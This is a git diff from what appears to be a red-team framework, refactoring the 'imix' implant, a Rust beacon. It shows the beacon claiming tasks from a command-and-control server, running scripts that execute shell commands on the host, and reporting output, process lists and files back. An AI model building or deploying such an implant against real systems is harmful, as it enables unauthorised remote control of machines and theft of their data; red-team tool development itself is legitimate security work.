_loop_start_time).as_millis(), - _local_err - ); - } - }; - - // 3. Sleep till callback time - let time_to_sleep = imix_config - .clone() - .callback_config - .interval - .checked_sub(_loop_start_time.elapsed().as_secs()) - .unwrap_or_else(|| 0); - - #[cfg(debug_assertions)] - eprintln!( - "[{}]: Sleeping seconds {}", - (Instant::now() - _loop_start_time).as_millis(), - time_to_sleep - ); - - std::thread::sleep(std::time::Duration::new(time_to_sleep as u64, 24601)); // This just sleeps our thread. 
- - // Check status & send response - #[cfg(debug_assertions)] - eprintln!( - "[{}]: Checking task status", - (Instant::now() - _loop_start_time).as_millis() - ); - - // Update running tasks and results - match submit_task_output( - _loop_start_time, - tavern_client, - &mut all_exec_futures, - &mut all_task_res_map, - ) - .await - { - Ok(_is_ok) => {} - Err(_local_err) => { - #[cfg(debug_assertions)] - eprintln!( - "[{}]: Error submitting task results {}", - (Instant::now() - _loop_start_time).as_millis(), - _local_err - ); - do_delay(imix_config.callback_config.interval, _loop_start_time); - } - }; + log::error!("callback loop fatal: {_err}"); - // Debug loop tracker - #[cfg(debug_assertions)] - if let Some(count_max) = _loop_count_max { - debug_loop_count += 1; - if debug_loop_count >= count_max { - return Ok(()); + tokio::time::sleep(Duration::from_secs(retry_interval)).await; } } } } -pub fn main() -> Result<(), imix::Error> { - let matches = Command::new("imix") - .arg( - arg!( - -c --config "Sets a custom config file" - ) - .required(false), - ) - .subcommand( - Command::new("install").about("Run in install mode").arg( - arg!( - -c --config "Sets a custom config file" - ) - .required(false), - ), - ) - .get_matches(); +async fn run(cfg: Config) -> Result<()> { + let mut agent = Agent::gen_from_config(cfg).await?; - match matches.subcommand() { - Some(("install", args)) => { - let config_path = args.value_of("config"); - match install::install_main(config_path) { - Ok(_) => {} - Err(local_err) => { - eprintln!( - "An error occured during installation: {}", - local_err.to_string() - ) - } - }; - } - _ => {} - } - - let runtime = tokio::runtime::Builder::new_multi_thread() - .worker_threads(128) - .enable_all() - .build() - .unwrap(); - - if let Some(config_path) = matches.value_of("config") { - match runtime.block_on(main_loop(config_path.to_string(), None)) { - Ok(_) => {} - Err(error) => eprintln!( - "Imix main_loop exited unexpectedly with config: {}\n{}", - config_path.to_string(), - error - ), - } - } + agent.callback_loop().await; Ok(()) } -#[cfg(test)] -mod tests { - - #[test] - fn imix_handle_exec_tome() {} - // #[test] - // fn imix_test_main_loop_sleep_twice_short() -> Result<()> { - // // Response expectations are poped in reverse order. 
- // let server = Server::run(); - // let test_task_id = "17179869185".to_string(); - // let post_result_response = GraphQLResponse { - // data: Some(SubmitTaskResult { - // id: test_task_id.clone(), - // }), - // errors: None, - // extensions: None, - // }; - // server.expect( - // Expectation::matching(all_of![ - // request::method_path("POST", "/graphql"), - // request::body(matches(".*variables.*execStartedAt.*")) - // ]) - // .times(1) - // .respond_with(status_code(200).body(serde_json::to_string(&post_result_response)?)), - // ); - - // let test_task = Task { - // id: test_task_id, - // quest: Quest { - // id: "4294967297".to_string(), - // name: "Exec stuff".to_string(), - // parameters: None, - // tome: Tome { - // id: "21474836482".to_string(), - // name: "sys exec".to_string(), - // description: "Execute system things.".to_string(), - // param_defs: None, - // eldritch: r#" - // def test(): - // if sys.is_macos(): - // sys.shell("sleep 3") - // if sys.is_linux(): - // sys.shell("sleep 3") - // if sys.is_windows(): - // sys.shell("timeout 3") - // test() - // print("main_loop_test_success")"# - // .to_string(), - // files: None, - // }, - // bundle: None, - // }, - // }; - // let claim_task_response = GraphQLResponse { - // data: Some(ClaimTasksResponseData { - // claim_tasks: vec![test_task.clone(), test_task.clone()], - // }), - // errors: None, - // extensions: None, - // }; - // server.expect( - // Expectation::matching(all_of![ - // request::method_path("POST", "/graphql"), - // request::body(matches(".*variables.*hostPlatform.*")) - // ]) - // .times(1) - // .respond_with(status_code(200).body(serde_json::to_string(&claim_task_response)?)), - // ); - // let url = server.url("/graphql").to_string(); - - // let tmp_file_new = NamedTempFile::new()?; - // let path_new = String::from(tmp_file_new.path().to_str().unwrap()).clone(); - // let _ = std::fs::write( - // path_new.clone(), - // format!( - // r#"{{ - // "service_configs": [], - // "target_forward_connect_ip": "127.0.0.1", - // "target_name": "test1234", - // "callback_config": {{ - // "interval": 4, - // "jitter": 0, - // "timeout": 4, - // "c2_configs": [ - // {{ - // "priority": 1, - // "uri": "{url}" - // }} - // ] - // }} - // }}"# - // ), - // ); - - // let runtime = tokio::runtime::Builder::new_multi_thread() - // .enable_all() - // .build() - // .unwrap(); - - // // Define a future for our execution task - // let start_time = Utc::now().time(); - // let exec_future = main_loop(path_new, Some(1)); - // let _result = runtime.block_on(exec_future).unwrap(); - // let end_time = Utc::now().time(); - // let diff = (end_time - start_time).num_milliseconds(); - // assert!(diff < 4500); - // Ok(()) - // } - - // #[test] - // fn imix_test_main_loop_run_once() -> Result<()> { - // let test_task_id = "17179869185".to_string(); - - // // Response expectations are poped in reverse order. 
- // let server = Server::run(); - - // let post_result_response = GraphQLResponse { - // data: Some(SubmitTaskResult { - // id: test_task_id.clone(), - // }), - // errors: None, - // extensions: None, - // }; - // server.expect( - // Expectation::matching(all_of![ - // request::method_path("POST", "/graphql"), - // request::body(matches(".*variables.*execStartedAt.*")) - // ]) - // .times(1) - // .respond_with(status_code(200).body(serde_json::to_string(&post_result_response)?)), - // ); - - // let claim_task_response = GraphQLResponse { - // data: Some(ClaimTasksResponseData { - // claim_tasks: vec![Task { - // id: test_task_id.clone(), - // quest: Quest { - // id: "4294967297".to_string(), - // name: "Exec stuff".to_string(), - // parameters: Some(r#"{"cmd":"echo main_loop_test_success"}"#.to_string()), - // tome: Tome { - // id: "21474836482".to_string(), - // name: "sys exec".to_string(), - // description: "Execute system things.".to_string(), - // param_defs: Some(r#"[{"name":"cmd","type":"string"}]"#.to_string()), - // eldritch: r#"print(sys.shell(input_params["cmd"]))"#.to_string(), - // files: None, - // }, - // bundle: None, - // }, - // }], - // }), - // errors: None, - // extensions: None, - // }; - // server.expect( - // Expectation::matching(all_of![ - // request::method_path("POST", "/graphql"), - // request::body(matches(".*variables.*hostPlatform.*")) - // ]) - // .times(1) - // .respond_with(status_code(200).body(serde_json::to_string(&claim_task_response)?)), - // ); - // let url = server.url("/graphql").to_string(); - - // let tmp_file_new = NamedTempFile::new()?; - // let path_new = String::from(tmp_file_new.path().to_str().unwrap()).clone(); - // let _ = std::fs::write( - // path_new.clone(), - // format!( - // r#"{{ - // "service_configs": [], - // "target_forward_connect_ip": "127.0.0.1", - // "target_name": "test1234", - // "callback_config": {{ - // "interval": 4, - // "jitter": 1, - // "timeout": 4, - // "c2_configs": [ - // {{ - // "priority": 1, - // "uri": "{url}" - // }} - // ] - // }} - // }}"# - // ), - // ); - - // let runtime = tokio::runtime::Builder::new_multi_thread() - // .enable_all() - // .build() - // .unwrap(); - - // let exec_future = main_loop(path_new, Some(1)); - // let _result = runtime.block_on(exec_future)?; - // assert!(true); - // Ok(()) - // } +#[cfg(debug_assertions)] +fn init_logging() { + pretty_env_logger::formatted_timed_builder() + .filter_level(log::LevelFilter::Info) + .parse_env("IMIX_LOG") + .init(); } diff --git a/implants/imix/src/task.rs b/implants/imix/src/task.rs new file mode 100644 index 000000000..7746b76a8 --- /dev/null +++ b/implants/imix/src/task.rs @@ -0,0 +1,97 @@ +use anyhow::Result; +use c2::{ + pb::{ReportProcessListRequest, ReportTaskOutputRequest, TaskError, TaskOutput}, + TavernClient, +}; +use eldritch::Output; +use tokio::task::JoinHandle; + +/* + * Task handle is responsible for tracking a running task and reporting it's output. + */ +pub struct TaskHandle { + id: i64, + handle: JoinHandle<()>, + output: Output, +} + +impl TaskHandle { + // Track a new task handle. + pub fn new(id: i64, output: Output, handle: JoinHandle<()>) -> TaskHandle { + TaskHandle { id, handle, output } + } + + // Returns true if the task has been completed, false otherwise. + pub fn is_finished(&self) -> bool { + self.handle.is_finished() + } + + // Report any available task output. 
+ pub async fn report(&mut self, tavern: &mut TavernClient) -> Result<()> { + let exec_started_at = self.output.get_exec_started_at(); + let exec_finished_at = self.output.get_exec_finished_at(); + let text = self.output.collect(); + let err = match self.output.collect_errors().pop() { + Some(err) => Some(TaskError { + msg: err.to_string(), + }), + None => None, + }; + + #[cfg(debug_assertions)] + log::info!( + "collected task output: task_id={}, exec_started_at={}, exec_finished_at={}, output={}, error={}", + self.id, + match exec_started_at.clone() { + Some(t) => t.to_string(), + None => String::from(""), + }, + match exec_finished_at.clone() { + Some(t) => t.to_string(), + None => String::from(""), + }, + text.join(""), + match err.clone() { + Some(_err) => _err.msg, + None => String::from(""), + } + ); + + if text.len() > 0 + || err.is_some() + || exec_started_at.is_some() + || exec_finished_at.is_some() + { + #[cfg(debug_assertions)] + log::info!("reporting task output: task_id={}", self.id); + + tavern + .report_task_output(ReportTaskOutputRequest { + output: Some(TaskOutput { + id: self.id, + output: text.join(""), + error: err, + exec_started_at: exec_started_at, + exec_finished_at: exec_finished_at, + }), + }) + .await?; + } + + // Report Process Lists + let process_lists = self.output.collect_process_lists(); + for list in process_lists { + #[cfg(debug_assertions)] + log::info!("reporting process list: len={}", list.list.len()); + + tavern + .report_process_list(ReportProcessListRequest { + task_id: self.id, + list: Some(list), + }) + .await?; + } + + Ok(()) + } +} diff --git a/implants/imix/src/tasks.rs b/implants/imix/src/tasks.rs deleted file mode 100644 index 085b23f8c..000000000 --- a/implants/imix/src/tasks.rs +++ /dev/null @@ -1,308 +0,0 @@ -use std::collections::HashMap; -use std::time::{Duration, Instant}; - -use crate::exec::{handle_exec_timeout_and_response, AsyncTask}; -use crate::init::AgentProperties; -use crate::{Config, TaskID}; -use anyhow::{Context, Result}; -use c2::pb::c2_manual_client::TavernClient; -use c2::pb::{ - Agent, Beacon, ClaimTasksRequest, Host, ReportTaskOutputRequest, ReportTaskOutputResponse, - Task, TaskError, TaskOutput, -}; -use chrono::Utc; -use std::sync::mpsc::{channel, Receiver}; -use tokio::task; -use tonic::Status; - -pub fn drain_sender(reciever: &Receiver) -> Result { - let mut channel_res: Vec = Vec::new(); - loop { - let new_res_line = match reciever.recv_timeout(Duration::from_millis(100)) { - Ok(local_res_string) => local_res_string, - Err(local_err) => { - match local_err.to_string().as_str() { - "channel is empty and sending half is closed" => { - break; - } - "timed out waiting on channel" => { - break; - } - _ => eprint!("Error: {}", local_err), - } - break; - } - }; - // let appended_line = format!("{}{}", res.to_owned(), new_res_line); - channel_res.push(new_res_line); - } - Ok(channel_res.join("")) -} - -pub async fn get_new_tasks( - agent_properties: AgentProperties, - imix_config: Config, - mut tavern_client: TavernClient, -) -> Result> { - let req = tonic::Request::new(ClaimTasksRequest { - beacon: Some(Beacon { - identifier: agent_properties.beacon_id.clone(), - principal: agent_properties.principal.clone(), - host: Some(Host { - identifier: agent_properties.host_id.clone(), - name: agent_properties.hostname.clone(), - platform: agent_properties.host_platform.try_into()?, - primary_ip: agent_properties - .primary_ip - .clone() - .context("primary ip not found")?, - }), - agent: Some(Agent { - identifier: 
agent_properties.agent_id.clone(), - }), - interval: imix_config.callback_config.interval, - }), - }); - let new_tasks = match tavern_client.claim_tasks(req).await { - Ok(resp) => resp.get_ref().tasks.clone(), - Err(_error) => { - #[cfg(debug_assertions)] - eprintln!("main_loop: error claiming task\n{:?}", _error); - let empty_vec = vec![]; - empty_vec - } - }; - Ok(new_tasks) -} - -pub async fn start_new_tasks( - new_tasks: Vec, - all_exec_futures: &mut HashMap, - debug_start_time: Instant, -) -> Result<()> { - for task in new_tasks { - #[cfg(debug_assertions)] - eprintln!("Parameters:\n{:?}", task.clone().parameters); - #[cfg(debug_assertions)] - eprintln!("Launching:\n{:?}", task.clone().eldritch); - - let (sender, receiver) = channel::(); - let (error_sender, error_receiver) = channel::(); - let exec_with_timeout = handle_exec_timeout_and_response( - task.clone(), - sender.clone(), - error_sender.clone(), - None, - ); - - #[cfg(debug_assertions)] - eprintln!( - "[{}]: Queueing task {}", - (Instant::now() - debug_start_time).as_millis(), - task.clone().id - ); - - match all_exec_futures.insert( - task.clone().id, - AsyncTask { - future_join_handle: task::spawn(exec_with_timeout), - start_time: Utc::now(), - grpc_task: task.clone(), - print_reciever: receiver, - error_reciever: error_receiver, - }, - ) { - Some(_old_task) => { - #[cfg(debug_assertions)] - eprintln!("main_loop: error adding new task. Non-unique taskID\n"); - } - None => { - #[cfg(debug_assertions)] - eprintln!("main_loop: Task queued successfully\n"); - } // Task queued successfully - } - - #[cfg(debug_assertions)] - eprintln!( - "[{}]: Queued task {}", - (Instant::now() - debug_start_time).as_millis(), - task.clone().id - ); - } - Ok(()) -} - -fn queue_task_output( - async_task: &AsyncTask, - task_id: TaskID, - running_task_res_map: &mut HashMap>, -) -> Result<()> { - let task_channel_output = drain_sender(&async_task.print_reciever)?; - let task_channel_error = drain_sender(&async_task.error_reciever)?; - - let task_is_finished = async_task.future_join_handle.is_finished(); - let task_response_exec_finished_at = match task_is_finished { - true => Some(Utc::now()), - false => None, - }; - - // If the task is finished or there's new data queue a new task result. - if task_is_finished || task_channel_output.len() > 0 { - let task_error = if task_channel_error.len() > 0 { - Some(TaskError { - msg: task_channel_error, - }) - } else { - None - }; - - let task_response = TaskOutput { - id: async_task.grpc_task.id.clone(), - exec_started_at: Some(prost_types::Timestamp { - seconds: async_task.start_time.timestamp(), - nanos: async_task.start_time.timestamp_subsec_nanos() as i32, - }), - exec_finished_at: match task_response_exec_finished_at { - Some(timestamp) => Some(prost_types::Timestamp { - seconds: timestamp.timestamp(), - nanos: timestamp.timestamp_subsec_nanos() as i32, - }), - None => None, - }, - output: task_channel_output, - error: task_error, - }; - - running_task_res_map - .entry(task_id) - .and_modify(|cur_list| { - cur_list.push(task_response.clone()); - }) - .or_insert(vec![task_response]); - } - Ok(()) -} - -pub async fn submit_task_output( - loop_start_time: Instant, - mut tavern_client: TavernClient, - all_exec_futures: &mut HashMap, - running_task_res_map: &mut HashMap>, -) -> Result<()> { - // let mut running_exec_futures: HashMap = HashMap::new(); - - for (task_id, async_task) in all_exec_futures.into_iter() { - #[cfg(debug_assertions)] - eprintln!( - "[{}]: Task # {} is_finished? 
{}", - (Instant::now() - loop_start_time).as_millis(), - task_id, - async_task.future_join_handle.is_finished() - ); - - // Loop over each line of output from the task and append it the the channel output. - queue_task_output(async_task, *task_id, running_task_res_map)?; - } - - // Iterate over queued task results and send them back to the server - for (task_id, task_res) in running_task_res_map.clone().into_iter() { - for output in task_res { - match send_tavern_output(&mut tavern_client, output).await { - Ok(_) => { - // Remove output that has been reported sucessfully. - running_task_res_map.remove(&task_id); - } - Err(_err) => { - #[cfg(debug_assertions)] - eprintln!("Failed to submit task resluts:\n{}", _err.to_string()); - {} - } - }; - } - } - - // Iterate over all tasks and remove finished ones. - all_exec_futures.retain(|_index, exec_task| !exec_task.future_join_handle.is_finished()); - - Ok(()) -} - -async fn send_tavern_output( - tavern_client: &mut TavernClient, - output: TaskOutput, -) -> Result, Status> { - let req = tonic::Request::new(ReportTaskOutputRequest { - output: Some(output), - }); - tavern_client.report_task_output(req).await -} - -#[cfg(test)] -mod tests { - use anyhow::Result; - use c2::pb::Task; - use std::collections::HashMap; - use std::time::Instant; - - use crate::exec::AsyncTask; - use crate::TaskID; - - use super::start_new_tasks; - - #[tokio::test] - async fn imix_test_start_new_tasks() -> Result<()> { - let debug_start_time = Instant::now(); - let mut all_exec_futures: HashMap = HashMap::new(); - let new_tasks = vec![Task { - id: 123, - eldritch: "print('okay')".to_string(), - parameters: HashMap::from([("iter".to_string(), "3".to_string())]), - file_names: Vec::new(), - quest_name: "test_quest".to_string(), - }]; - start_new_tasks(new_tasks, &mut all_exec_futures, debug_start_time).await?; - assert_eq!(all_exec_futures.len(), 1); - for (task_id, _async_task) in all_exec_futures.into_iter() { - assert_eq!(task_id, 123); - } - Ok(()) - } - - // #[test] - // fn imix_test_queue_task_output() -> Result<()> { - // let (sender, receiver) = channel::(); - - // let test_task = Task { - // id: 123, - // eldritch: "print('okay')".to_string(), - // parameters: HashMap::from([("iter".to_string(), "3".to_string())]), - // }; - // let exec_with_timeout = - // handle_exec_timeout_and_response(test_task.clone(), sender.clone(), None); - - // let async_task = AsyncTask { - // future_join_handle: task::spawn(exec_with_timeout), - // start_time: Utc::now(), - // grpc_task: test_task, - // print_reciever: receiver, - // }; - // let task_id = 123; - // let mut running_task_res_map: HashMap> = HashMap::new(); - // let loop_start_time = Instant::now(); - // for _ in 1..10 { - // queue_task_output( - // &async_task, - // task_id, - // &mut running_task_res_map, - // loop_start_time, - // ); - // thread::sleep(Duration::from_millis(200)); - // } - // assert_eq!(running_task_res_map.len(), 1); - // for (local_task_id, vec_task_output) in running_task_res_map { - // assert_eq!(local_task_id, 123); - // println!("vec_task_output: {:?}", vec_task_output); - // } - // Ok(()) - // } -} diff --git a/implants/imix/src/version.rs b/implants/imix/src/version.rs new file mode 100644 index 000000000..ed478342e --- /dev/null +++ b/implants/imix/src/version.rs @@ -0,0 +1,7 @@ +macro_rules! 
crate_version { + () => { + env!("CARGO_PKG_VERSION") + }; +} + +pub const VERSION: &'static str = crate_version!(); diff --git a/implants/lib/c2/Cargo.toml b/implants/lib/c2/Cargo.toml index 1a0da88ae..5882929e2 100644 --- a/implants/lib/c2/Cargo.toml +++ b/implants/lib/c2/Cargo.toml @@ -1,16 +1,18 @@ [package] name = "c2" -version = "0.0.4" +version = "0.0.5" edition = "2021" # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html [dependencies] +eldritch = { workspace = true } tonic = { workspace = true, features = ["tls-roots"] } prost = { workspace = true} prost-types = { workspace = true } tokio = { workspace = true, features = ["macros", "rt-multi-thread"] } [build-dependencies] +eldritch = { workspace = true } tonic-build = { workspace = true } which = { workspace = true } diff --git a/implants/lib/c2/build.rs b/implants/lib/c2/build.rs index 0ef16ccc7..b13349092 100644 --- a/implants/lib/c2/build.rs +++ b/implants/lib/c2/build.rs @@ -17,10 +17,12 @@ fn main() -> Result<(), Box> { match tonic_build::configure() .out_dir("./src") .build_server(false) - .compile(&["c2.proto"], &["../../../tavern/internal/c2/"]) + .extern_path(".eldritch", "::eldritch::pb") + .compile(&["c2.proto"], &["../../../tavern/internal/c2/proto/"]) { Err(err) => { println!("WARNING: Failed to compile protos: {}", err); + panic!("{}", err); } Ok(_) => println!("Generating protos"), } diff --git a/implants/lib/c2/src/c2.rs b/implants/lib/c2/src/c2.rs index 918fd6298..0f6b03081 100644 --- a/implants/lib/c2/src/c2.rs +++ b/implants/lib/c2/src/c2.rs @@ -82,120 +82,15 @@ pub mod host { } } } -/// Process running on the host system. -#[allow(clippy::derive_partial_eq_without_eq)] -#[derive(Clone, PartialEq, ::prost::Message)] -pub struct Process { - #[prost(uint64, tag = "1")] - pub pid: u64, - #[prost(uint64, tag = "2")] - pub ppid: u64, - #[prost(string, tag = "3")] - pub name: ::prost::alloc::string::String, - #[prost(string, tag = "4")] - pub principal: ::prost::alloc::string::String, - #[prost(string, tag = "5")] - pub path: ::prost::alloc::string::String, - #[prost(string, tag = "6")] - pub cmd: ::prost::alloc::string::String, - #[prost(string, tag = "7")] - pub env: ::prost::alloc::string::String, - #[prost(string, tag = "8")] - pub cwd: ::prost::alloc::string::String, - #[prost(enumeration = "process::Status", tag = "9")] - pub status: i32, -} -/// Nested message and enum types in `Process`. -pub mod process { - #[derive( - Clone, - Copy, - Debug, - PartialEq, - Eq, - Hash, - PartialOrd, - Ord, - ::prost::Enumeration - )] - #[repr(i32)] - pub enum Status { - Unspecified = 0, - Unknown = 1, - Idle = 2, - Run = 3, - Sleep = 4, - Stop = 5, - Zombie = 6, - Tracing = 7, - Dead = 8, - WakeKill = 9, - Waking = 10, - Parked = 11, - LockBlocked = 12, - UninteruptibleDiskSleep = 13, - } - impl Status { - /// String value of the enum field names used in the ProtoBuf definition. - /// - /// The values are not transformed in any way and thus are considered stable - /// (if the ProtoBuf definition does not change) and safe for programmatic use. 
- pub fn as_str_name(&self) -> &'static str { - match self { - Status::Unspecified => "STATUS_UNSPECIFIED", - Status::Unknown => "STATUS_UNKNOWN", - Status::Idle => "STATUS_IDLE", - Status::Run => "STATUS_RUN", - Status::Sleep => "STATUS_SLEEP", - Status::Stop => "STATUS_STOP", - Status::Zombie => "STATUS_ZOMBIE", - Status::Tracing => "STATUS_TRACING", - Status::Dead => "STATUS_DEAD", - Status::WakeKill => "STATUS_WAKE_KILL", - Status::Waking => "STATUS_WAKING", - Status::Parked => "STATUS_PARKED", - Status::LockBlocked => "STATUS_LOCK_BLOCKED", - Status::UninteruptibleDiskSleep => "STATUS_UNINTERUPTIBLE_DISK_SLEEP", - } - } - /// Creates an enum from field names used in the ProtoBuf definition. - pub fn from_str_name(value: &str) -> ::core::option::Option { - match value { - "STATUS_UNSPECIFIED" => Some(Self::Unspecified), - "STATUS_UNKNOWN" => Some(Self::Unknown), - "STATUS_IDLE" => Some(Self::Idle), - "STATUS_RUN" => Some(Self::Run), - "STATUS_SLEEP" => Some(Self::Sleep), - "STATUS_STOP" => Some(Self::Stop), - "STATUS_ZOMBIE" => Some(Self::Zombie), - "STATUS_TRACING" => Some(Self::Tracing), - "STATUS_DEAD" => Some(Self::Dead), - "STATUS_WAKE_KILL" => Some(Self::WakeKill), - "STATUS_WAKING" => Some(Self::Waking), - "STATUS_PARKED" => Some(Self::Parked), - "STATUS_LOCK_BLOCKED" => Some(Self::LockBlocked), - "STATUS_UNINTERUPTIBLE_DISK_SLEEP" => Some(Self::UninteruptibleDiskSleep), - _ => None, - } - } - } -} /// Task instructions for the beacon to execute. #[allow(clippy::derive_partial_eq_without_eq)] #[derive(Clone, PartialEq, ::prost::Message)] pub struct Task { #[prost(int64, tag = "1")] pub id: i64, - #[prost(string, tag = "2")] - pub eldritch: ::prost::alloc::string::String, - #[prost(map = "string, string", tag = "3")] - pub parameters: ::std::collections::HashMap< - ::prost::alloc::string::String, - ::prost::alloc::string::String, - >, - #[prost(string, repeated, tag = "4")] - pub file_names: ::prost::alloc::vec::Vec<::prost::alloc::string::String>, - #[prost(string, tag = "5")] + #[prost(message, optional, tag = "2")] + pub tome: ::core::option::Option<::eldritch::pb::Tome>, + #[prost(string, tag = "3")] pub quest_name: ::prost::alloc::string::String, } /// TaskError provides information when task execution fails. 
@@ -253,20 +148,8 @@ pub struct DownloadFileResponse { pub struct ReportFileRequest { #[prost(int64, tag = "1")] pub task_id: i64, - #[prost(string, tag = "2")] - pub path: ::prost::alloc::string::String, - #[prost(string, tag = "3")] - pub owner: ::prost::alloc::string::String, - #[prost(string, tag = "4")] - pub group: ::prost::alloc::string::String, - #[prost(string, tag = "5")] - pub permissions: ::prost::alloc::string::String, - #[prost(int64, tag = "6")] - pub size: i64, - #[prost(string, tag = "7")] - pub sha3_256_hash: ::prost::alloc::string::String, - #[prost(bytes = "vec", tag = "8")] - pub chunk: ::prost::alloc::vec::Vec, + #[prost(message, optional, tag = "2")] + pub chunk: ::core::option::Option<::eldritch::pb::File>, } #[allow(clippy::derive_partial_eq_without_eq)] #[derive(Clone, PartialEq, ::prost::Message)] @@ -274,10 +157,10 @@ pub struct ReportFileResponse {} #[allow(clippy::derive_partial_eq_without_eq)] #[derive(Clone, PartialEq, ::prost::Message)] pub struct ReportProcessListRequest { - #[prost(message, repeated, tag = "1")] - pub list: ::prost::alloc::vec::Vec, - #[prost(int64, tag = "2")] + #[prost(int64, tag = "1")] pub task_id: i64, + #[prost(message, optional, tag = "2")] + pub list: ::core::option::Option<::eldritch::pb::ProcessList>, } #[allow(clippy::derive_partial_eq_without_eq)] #[derive(Clone, PartialEq, ::prost::Message)] diff --git a/implants/lib/c2/src/c2_manual.rs b/implants/lib/c2/src/c2_manual.rs index af9f25aae..9a7c52413 100644 --- a/implants/lib/c2/src/c2_manual.rs +++ b/implants/lib/c2/src/c2_manual.rs @@ -1,154 +1,148 @@ -pub mod c2_manual_client { +use crate::pb::{ + ClaimTasksRequest, ClaimTasksResponse, DownloadFileRequest, DownloadFileResponse, + ReportFileRequest, ReportFileResponse, ReportProcessListRequest, ReportProcessListResponse, + ReportTaskOutputRequest, ReportTaskOutputResponse, +}; +use tonic::codec::ProstCodec; +use tonic::GrpcMethod; - use tonic::codec::ProstCodec; - use tonic::GrpcMethod; +static CLAIM_TASKS_PATH: &str = "/c2.C2/ClaimTasks"; +static DOWNLOAD_FILE_PATH: &str = "/c2.C2/DownloadFile"; +static REPORT_FILE_PATH: &str = "/c2.C2/ReportFile"; +static REPORT_PROCESS_LIST_PATH: &str = "/c2.C2/ReportProcessList"; +static REPORT_TASK_OUTPUT_PATH: &str = "/c2.C2/ReportTaskOutput"; - static CLAIM_TASKS_PATH: &str = "/c2.C2/ClaimTasks"; - static DOWNLOAD_FILE_PATH: &str = "/c2.C2/DownloadFile"; - static REPORT_FILE_PATH: &str = "/c2.C2/ReportFile"; - static REPORT_PROCESS_LIST_PATH: &str = "/c2.C2/ReportProcessList"; - static REPORT_TASK_OUTPUT_PATH: &str = "/c2.C2/ReportTaskOutput"; +#[derive(Debug, Clone)] +pub struct TavernClient { + grpc: tonic::client::Grpc, +} - #[derive(Debug, Clone)] - pub struct TavernClient { - grpc: tonic::client::Grpc, +impl TavernClient { + pub async fn connect(callback: String) -> Result { + let endpoint = tonic::transport::Endpoint::from_shared(callback)?; + let channel = endpoint.connect().await?; + let grpc = tonic::client::Grpc::new(channel); + Ok(Self { grpc }) } - impl TavernClient { - pub async fn connect(callback: String) -> Result { - let endpoint = tonic::transport::Endpoint::from_shared(callback)?; - let channel = endpoint.connect().await?; - let grpc = tonic::client::Grpc::new(channel); - Ok(Self { grpc }) - } - - /// - /// Contact the server for new tasks to execute. 
- pub async fn claim_tasks( - &mut self, - request: impl tonic::IntoRequest, - ) -> std::result::Result, tonic::Status> - { - self.grpc.ready().await.map_err(|e| { - tonic::Status::new( - tonic::Code::Unknown, - format!("Service was not ready: {}", e), - ) - })?; - let codec: ProstCodec = - tonic::codec::ProstCodec::default(); + /// + /// Contact the server for new tasks to execute. + pub async fn claim_tasks( + &mut self, + request: impl tonic::IntoRequest, + ) -> std::result::Result, tonic::Status> { + self.grpc.ready().await.map_err(|e| { + tonic::Status::new( + tonic::Code::Unknown, + format!("Service was not ready: {}", e), + ) + })?; + let codec: ProstCodec = + tonic::codec::ProstCodec::default(); - let path = tonic::codegen::http::uri::PathAndQuery::from_static(CLAIM_TASKS_PATH); - let mut req = request.into_request(); - req.extensions_mut() - .insert(GrpcMethod::new("c2.C2", "ClaimTasks")); - self.grpc.unary(req, path, codec).await - } + let path = tonic::codegen::http::uri::PathAndQuery::from_static(CLAIM_TASKS_PATH); + let mut req = request.into_request(); + req.extensions_mut() + .insert(GrpcMethod::new("c2.C2", "ClaimTasks")); + self.grpc.unary(req, path, codec).await + } - /// - /// Download a file from the server, returning one or more chunks of data. - /// The maximum size of these chunks is determined by the server. - /// The server should reply with two headers: - /// - "sha3-256-checksum": A SHA3-256 digest of the entire file contents. - /// - "file-size": The number of bytes contained by the file. - /// - /// If no associated file can be found, a NotFound status error is returned. - pub async fn download_file( - &mut self, - request: impl tonic::IntoRequest, - ) -> std::result::Result< - tonic::Response>, - tonic::Status, - > { - self.grpc.ready().await.map_err(|e| { - tonic::Status::new( - tonic::Code::Unknown, - format!("Service was not ready: {}", e), - ) - })?; - let codec: ProstCodec = - tonic::codec::ProstCodec::default(); - let path = tonic::codegen::http::uri::PathAndQuery::from_static(DOWNLOAD_FILE_PATH); - let mut req = request.into_request(); - req.extensions_mut() - .insert(GrpcMethod::new("c2.C2", "DownloadFile")); - self.grpc.server_streaming(req, path, codec).await - } + /// + /// Download a file from the server, returning one or more chunks of data. + /// The maximum size of these chunks is determined by the server. + /// The server should reply with two headers: + /// - "sha3-256-checksum": A SHA3-256 digest of the entire file contents. + /// - "file-size": The number of bytes contained by the file. + /// + /// If no associated file can be found, a NotFound status error is returned. + pub async fn download_file( + &mut self, + request: impl tonic::IntoRequest, + ) -> std::result::Result< + tonic::Response>, + tonic::Status, + > { + self.grpc.ready().await.map_err(|e| { + tonic::Status::new( + tonic::Code::Unknown, + format!("Service was not ready: {}", e), + ) + })?; + let codec: ProstCodec = + tonic::codec::ProstCodec::default(); + let path = tonic::codegen::http::uri::PathAndQuery::from_static(DOWNLOAD_FILE_PATH); + let mut req = request.into_request(); + req.extensions_mut() + .insert(GrpcMethod::new("c2.C2", "DownloadFile")); + self.grpc.server_streaming(req, path, codec).await + } - /// - /// Report a file from the host to the server. - /// Providing content of the file is optional. If content is provided: - /// - Hash will automatically be calculated and the provided hash will be ignored. 
- /// - Size will automatically be calculated and the provided size will be ignored. - /// Content is provided as chunks, the size of which are up to the agent to define (based on memory constraints). - /// Any existing files at the provided path for the host are replaced. - pub async fn report_file( - &mut self, - request: impl tonic::IntoStreamingRequest, - ) -> std::result::Result, tonic::Status> - { - self.grpc.ready().await.map_err(|e| { - tonic::Status::new( - tonic::Code::Unknown, - format!("Service was not ready: {}", e), - ) - })?; - let codec: ProstCodec = - tonic::codec::ProstCodec::default(); - let path = tonic::codegen::http::uri::PathAndQuery::from_static(REPORT_FILE_PATH); - let mut req = request.into_streaming_request(); - req.extensions_mut() - .insert(GrpcMethod::new("c2.C2", "ReportFile")); - self.grpc.client_streaming(req, path, codec).await - } + /// + /// Report a file from the host to the server. + /// Providing content of the file is optional. If content is provided: + /// - Hash will automatically be calculated and the provided hash will be ignored. + /// - Size will automatically be calculated and the provided size will be ignored. + /// Content is provided as chunks, the size of which are up to the agent to define (based on memory constraints). + /// Any existing files at the provided path for the host are replaced. + pub async fn report_file( + &mut self, + request: impl tonic::IntoStreamingRequest, + ) -> std::result::Result, tonic::Status> { + self.grpc.ready().await.map_err(|e| { + tonic::Status::new( + tonic::Code::Unknown, + format!("Service was not ready: {}", e), + ) + })?; + let codec: ProstCodec = + 